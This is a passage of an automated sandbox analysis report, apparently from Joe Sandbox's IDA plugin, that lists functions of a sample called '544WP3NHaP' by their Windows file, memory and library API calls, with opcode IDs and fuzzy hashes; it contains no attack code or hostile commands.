                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BEAF9
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID: 3Ro
                                                                                                                                  • API String ID: 1269201914-1492261280
                                                                                                                                  • Opcode ID: 24d4f0df55a83865206bfd108a2695966601c4d50d384119de691d83ce424af5
                                                                                                                                  • Instruction ID: f96f846dec16ecb393ebfa7f10367bdf5e96d09923cd7d45a4243983f58b8237
                                                                                                                                  • Opcode Fuzzy Hash: 24d4f0df55a83865206bfd108a2695966601c4d50d384119de691d83ce424af5
                                                                                                                                  • Instruction Fuzzy Hash: 83B012C629B5577D350472052E02CF7065DF6E0B90330D13FF410D43C1DC805C011472
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008CB7BB: GetOEMCP.KERNEL32(00000000,?,?,008CBA44,?), ref: 008CB7E6
                                                                                                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,008CBA89,?,00000000), ref: 008CBC64
                                                                                                                                  • GetCPInfo.KERNEL32(00000000,008CBA89,?,?,?,008CBA89,?,00000000), ref: 008CBC77
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CodeInfoPageValid
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 546120528-0
                                                                                                                                  • Opcode ID: 31ba9b2f78539b9f6e9b8372412d839843f24221e307bce3b7b7bd56a752082d
                                                                                                                                  • Instruction ID: 38aa7c5f0472e2cc0a825bb651e40cd90f95b92ff531d15a1639cb0122c096a4
                                                                                                                                  • Opcode Fuzzy Hash: 31ba9b2f78539b9f6e9b8372412d839843f24221e307bce3b7b7bd56a752082d
                                                                                                                                  • Instruction Fuzzy Hash: B3513270A00A499EDB209F75C882FBABBF4FF41310F18406ED596CB252DB35D946CB91
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,008A9A50,?,?,00000000,?,?,008A8CBC,?), ref: 008A9BAB
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,008A8411,-00009570,00000000,000007F3), ref: 008A9BB6
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                  • Opcode ID: a686fb108465a0c52103a1eb8780121fc8e6bb86c509b3afdd696e63246a87f6
                                                                                                                                  • Instruction ID: ba8db1f522de93b782e322a84a06e93cff43636f43af5474ede6f41cf5aaadde
                                                                                                                                  • Opcode Fuzzy Hash: a686fb108465a0c52103a1eb8780121fc8e6bb86c509b3afdd696e63246a87f6
                                                                                                                                  • Instruction Fuzzy Hash: 4B41D2305083258FEB24DF19E58456AB7E5FFD6330F148A2EE8C2C3A60D770ED468A61
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008C97E5: GetLastError.KERNEL32(?,008E1030,008C4674,008E1030,?,?,008C3F73,00000050,?,008E1030,00000200), ref: 008C97E9
                                                                                                                                    • Part of subcall function 008C97E5: _free.LIBCMT ref: 008C981C
                                                                                                                                    • Part of subcall function 008C97E5: SetLastError.KERNEL32(00000000,?,008E1030,00000200), ref: 008C985D
                                                                                                                                    • Part of subcall function 008C97E5: _abort.LIBCMT ref: 008C9863
                                                                                                                                    • Part of subcall function 008CBB4E: _abort.LIBCMT ref: 008CBB80
                                                                                                                                    • Part of subcall function 008CBB4E: _free.LIBCMT ref: 008CBBB4
                                                                                                                                    • Part of subcall function 008CB7BB: GetOEMCP.KERNEL32(00000000,?,?,008CBA44,?), ref: 008CB7E6
                                                                                                                                  • _free.LIBCMT ref: 008CBA9F
                                                                                                                                  • _free.LIBCMT ref: 008CBAD5
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorLast_abort
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2991157371-0
                                                                                                                                  • Opcode ID: c62f1a1d73bc5ff2fa5d0ebcfef860ceab3e65f738eb2923054074c306a95a02
                                                                                                                                  • Instruction ID: 474cc11cd75316f08a4a626d618abe9b5d4360a472ef1a50f3ea988627e72696
                                                                                                                                  • Opcode Fuzzy Hash: c62f1a1d73bc5ff2fa5d0ebcfef860ceab3e65f738eb2923054074c306a95a02
                                                                                                                                  • Instruction Fuzzy Hash: 18318B31905619AFDB10EBA8D842FA9B7B5FB40320F25419EE944DB2A2EB32DD40DB51
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008A1E55
                                                                                                                                    • Part of subcall function 008A3BBA: __EH_prolog.LIBCMT ref: 008A3BBF
                                                                                                                                  • _wcslen.LIBCMT ref: 008A1EFD
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog$_wcslen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2838827086-0
                                                                                                                                  • Opcode ID: 0861469a8ff68e35cfdf5f32f2b607b0d08d15f66e527aefb87e86cbf0ded29c
                                                                                                                                  • Instruction ID: 00b541b98cd95e1244cbd47690674abd05d4b6bee3be369ac090e9bf4bb6ea76
                                                                                                                                  • Opcode Fuzzy Hash: 0861469a8ff68e35cfdf5f32f2b607b0d08d15f66e527aefb87e86cbf0ded29c
                                                                                                                                  • Instruction Fuzzy Hash: A2316871904208AFDF11DF98C959AEEBBF6FF09300F20006AE845E7651CB369E10CB61
                                                                                                                                  APIs
                                                                                                                                  • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,008A73BC,?,?,?,00000000), ref: 008A9DBC
                                                                                                                                  • SetFileTime.KERNELBASE(?,?,?,?), ref: 008A9E70
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$BuffersFlushTime
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1392018926-0
                                                                                                                                  • Opcode ID: d254a665da93099530960cc14c9023a9e0bd145c04459bcb76cf3e8ad3cade6b
                                                                                                                                  • Instruction ID: 0288468f391ab17fd92ea825e62b1546b0a099012bc84022a075ffaf6655fdd7
                                                                                                                                  • Opcode Fuzzy Hash: d254a665da93099530960cc14c9023a9e0bd145c04459bcb76cf3e8ad3cade6b
                                                                                                                                  • Instruction Fuzzy Hash: DC21E13124C2459BDB14CF34C491AABBBE8FF56304F08491DF4C5C7942D368D95C8B62
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,008A9F27,?,?,008A771A), ref: 008A96E6
                                                                                                                                  • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,008A9F27,?,?,008A771A), ref: 008A9716
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                  • Opcode ID: 2b16d85ab9cca5f89907f5d87f9d6bd78c3f7ebbe6dc0d09a370d55e2c8750d3
                                                                                                                                  • Instruction ID: f42f9f2e60363aea297d7c0bb8ddbc91b2bc320fceaad1f52f12147631b26d12
                                                                                                                                  • Opcode Fuzzy Hash: 2b16d85ab9cca5f89907f5d87f9d6bd78c3f7ebbe6dc0d09a370d55e2c8750d3
                                                                                                                                  • Instruction Fuzzy Hash: D921AE711087446FF2708A698C89BA777DCFB5A324F100A19FAD5C69D1C764A8848632
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 008A9EC7
                                                                                                                                  • GetLastError.KERNEL32 ref: 008A9ED4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                  • Opcode ID: 5fecb07128cbf61cb1fc681e9d9a2c752ac8912a4ba5c224b966745ee18a95a9
                                                                                                                                  • Instruction ID: 8ed362cabeaed82507cb967663953880a892f6c1743520588b19eee5405c3ff1
                                                                                                                                  • Opcode Fuzzy Hash: 5fecb07128cbf61cb1fc681e9d9a2c752ac8912a4ba5c224b966745ee18a95a9
                                                                                                                                  • Instruction Fuzzy Hash: 1611E530604704ABF724C628C844BA6B7E8FB46370F504A29E192D2ED1E7B0ED59C760
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 008C8E75
                                                                                                                                    • Part of subcall function 008C8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008CCA2C,00000000,?,008C6CBE,?,00000008,?,008C91E0,?,?,?), ref: 008C8E38
                                                                                                                                  • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,008E1098,008A17CE,?,?,00000007,?,?,?,008A13D6,?,00000000), ref: 008C8EB1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocAllocate_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2447670028-0
                                                                                                                                  • Opcode ID: 1391fb71fd5c5df96a50cb5b0aec6cc8aabd14de46466d10494e0a36a89b1e48
                                                                                                                                  • Instruction ID: d85ad9185c7ff27c049d46fc1e515bf72984a8ef1a9ed83975ad695332f96320
                                                                                                                                  • Opcode Fuzzy Hash: 1391fb71fd5c5df96a50cb5b0aec6cc8aabd14de46466d10494e0a36a89b1e48
                                                                                                                                  • Instruction Fuzzy Hash: DAF0F632685115EACB212A6DAC05FAF3778FF82B70F69412EF814EB191DF71DD0091A2
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?), ref: 008B10AB
                                                                                                                                  • GetProcessAffinityMask.KERNEL32(00000000), ref: 008B10B2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$AffinityCurrentMask
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1231390398-0
                                                                                                                                  • Opcode ID: 78384a384c86fc8cafefa8b616b67e7dc4975a9706e3cc5e3137cd1e9be91136
                                                                                                                                  • Instruction ID: 383c3c5537c720185ce54ce348b257e42958217c74943360918d61b119c8b913
                                                                                                                                  • Opcode Fuzzy Hash: 78384a384c86fc8cafefa8b616b67e7dc4975a9706e3cc5e3137cd1e9be91136
                                                                                                                                  • Instruction Fuzzy Hash: ECE0D832B00949A7CF19A7B49C198EB73EDFA442047108176E403DB201F930DE464A60
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008CBF30: GetEnvironmentStringsW.KERNEL32 ref: 008CBF39
                                                                                                                                    • Part of subcall function 008CBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008CBF5C
                                                                                                                                    • Part of subcall function 008CBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 008CBF82
                                                                                                                                    • Part of subcall function 008CBF30: _free.LIBCMT ref: 008CBF95
                                                                                                                                    • Part of subcall function 008CBF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 008CBFA4
                                                                                                                                  • _free.LIBCMT ref: 008C82AE
                                                                                                                                  • _free.LIBCMT ref: 008C82B5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 400815659-0
                                                                                                                                  • Opcode ID: a3e6cde1870f390c53d5f83e0b91d208b45e5ba238f32fb13905012ea47ce638
                                                                                                                                  • Instruction ID: 0b4441ba057898b62617836e75c8b33e2a09d14c5e284ce36314d944ba00944c
                                                                                                                                  • Opcode Fuzzy Hash: a3e6cde1870f390c53d5f83e0b91d208b45e5ba238f32fb13905012ea47ce638
                                                                                                                                  • Instruction Fuzzy Hash: ECE0E533695E52C9E265327D3C0AF6B0674EB81338F25022EF621D70C3CE30C80215A7
                                                                                                                                  APIs
                                                                                                                                  • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,008AA325,?,?,?,008AA175,?,00000001,00000000,?,?), ref: 008AA501
                                                                                                                                    • Part of subcall function 008ABB03: _wcslen.LIBCMT ref: 008ABB27
                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,008AA325,?,?,?,008AA175,?,00000001,00000000,?,?), ref: 008AA532
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AttributesFile$_wcslen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2673547680-0
                                                                                                                                  • Opcode ID: 2c063ef97b14b41aac85c135a113199bcc477896193b69c70d0cc0c9f47b13b1
                                                                                                                                  • Instruction ID: d2bda2717be174a20dd6024543c9621319ac9920515c143bf3dd76abf399442d
                                                                                                                                  • Opcode Fuzzy Hash: 2c063ef97b14b41aac85c135a113199bcc477896193b69c70d0cc0c9f47b13b1
                                                                                                                                  • Instruction Fuzzy Hash: 2AF0A0312001097BEF015F60DC01FDA376CFB04385F448052B845D5160DB31DE94DA21
                                                                                                                                  APIs
                                                                                                                                  • DeleteFileW.KERNELBASE(000000FF,?,?,008A977F,?,?,008A95CF,?,?,?,?,?,008D2641,000000FF), ref: 008AA1F1
                                                                                                                                    • Part of subcall function 008ABB03: _wcslen.LIBCMT ref: 008ABB27
                                                                                                                                  • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,008A977F,?,?,008A95CF,?,?,?,?,?,008D2641), ref: 008AA21F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DeleteFile$_wcslen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2643169976-0
                                                                                                                                  • Opcode ID: 018983db4932dbe797f3fff351922a8fcab741cfbe46e9c1dc3623e12950fcf2
                                                                                                                                  • Instruction ID: 7f15be1fb4cccab0f4eafd8a4404f7ac55337d3eb7de662842f7283cfbdbd10e
                                                                                                                                  • Opcode Fuzzy Hash: 018983db4932dbe797f3fff351922a8fcab741cfbe46e9c1dc3623e12950fcf2
                                                                                                                                  • Instruction Fuzzy Hash: C8E092351402096BEB015F64DC45FDD379CFB09381F484021B945E2450EB61DE98DA62
                                                                                                                                  APIs
                                                                                                                                  • GdiplusShutdown.GDIPLUS(?,?,?,?,008D2641,000000FF), ref: 008BACB0
                                                                                                                                  • CoUninitialize.COMBASE(?,?,?,?,008D2641,000000FF), ref: 008BACB5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: GdiplusShutdownUninitialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3856339756-0
                                                                                                                                  • Opcode ID: 59cd871ebb44c9c0e3c4bbb4b4b7db126c4554dd6764ce3c0a0778ded2369381
                                                                                                                                  • Instruction ID: bb36656d363ef7bea0d6b438b25209cdd448dedc36789420dd403142782a238c
                                                                                                                                  • Opcode Fuzzy Hash: 59cd871ebb44c9c0e3c4bbb4b4b7db126c4554dd6764ce3c0a0778ded2369381
                                                                                                                                  • Instruction Fuzzy Hash: 03E06D72648650EFCB009B5CDC46B49FBADFB88B20F00436AF416D37A0CB74A841CA95
                                                                                                                                  APIs
                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,008AA23A,?,008A755C,?,?,?,?), ref: 008AA254
                                                                                                                                    • Part of subcall function 008ABB03: _wcslen.LIBCMT ref: 008ABB27
                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,008AA23A,?,008A755C,?,?,?,?), ref: 008AA280
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AttributesFile$_wcslen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2673547680-0
                                                                                                                                  • Opcode ID: 8172f7122cca0c430c8b0792f44a125d07f2dbe827048e3e2decedf0ee081f11
                                                                                                                                  • Instruction ID: a30ad1356e75ed99aa622dcbe74d749dea5c382d0efc0fb7467fdafac3e77227
                                                                                                                                  • Opcode Fuzzy Hash: 8172f7122cca0c430c8b0792f44a125d07f2dbe827048e3e2decedf0ee081f11
                                                                                                                                  • Instruction Fuzzy Hash: 67E092315001285BDB50AB68CC05BE97B98FB1D3E1F044261FD45E3290D770DE44CAA1
                                                                                                                                  APIs
                                                                                                                                  • _swprintf.LIBCMT ref: 008BDEEC
                                                                                                                                    • Part of subcall function 008A4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008A40A5
                                                                                                                                  • SetDlgItemTextW.USER32(00000065,?), ref: 008BDF03
                                                                                                                                    • Part of subcall function 008BB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008BB579
                                                                                                                                    • Part of subcall function 008BB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008BB58A
                                                                                                                                    • Part of subcall function 008BB568: IsDialogMessageW.USER32(00010424,?), ref: 008BB59E
                                                                                                                                    • Part of subcall function 008BB568: TranslateMessage.USER32(?), ref: 008BB5AC
                                                                                                                                    • Part of subcall function 008BB568: DispatchMessageW.USER32(?), ref: 008BB5B6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2718869927-0
                                                                                                                                  • Opcode ID: 56350b6ee95ed26d12f4da96c1e6e8d980bf40880b086c1672600083e19e79cf
                                                                                                                                  • Instruction ID: 93b457cabbbc993f437075d84c2e1e89a71981346b1db778ad150ac7e2a4df49
                                                                                                                                  • Opcode Fuzzy Hash: 56350b6ee95ed26d12f4da96c1e6e8d980bf40880b086c1672600083e19e79cf
                                                                                                                                  • Instruction Fuzzy Hash: EAE09B714142486ADF01A764DC06FDE3B6CFB15785F040851B205DB1E3D974E6109666
                                                                                                                                  APIs
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008B0836
                                                                                                                                  • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,008AF2D8,Crypt32.dll,00000000,008AF35C,?,?,008AF33E,?,?,?), ref: 008B0858
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DirectoryLibraryLoadSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1175261203-0
                                                                                                                                  • Opcode ID: 7f08953ece57a1c4c8deeb2a8ae7c366d30274445312de4d1dc6697b19709918
                                                                                                                                  • Instruction ID: 37b10b1caa8128b372133629a3b22919eb711be49d2b5265187d27dc74af16da
                                                                                                                                  • Opcode Fuzzy Hash: 7f08953ece57a1c4c8deeb2a8ae7c366d30274445312de4d1dc6697b19709918
                                                                                                                                  • Instruction Fuzzy Hash: 83E04F768011286BDB11ABA5DC09FDB7BACFF093D1F040076B649E2104DAB4EB84CBB1
                                                                                                                                  APIs
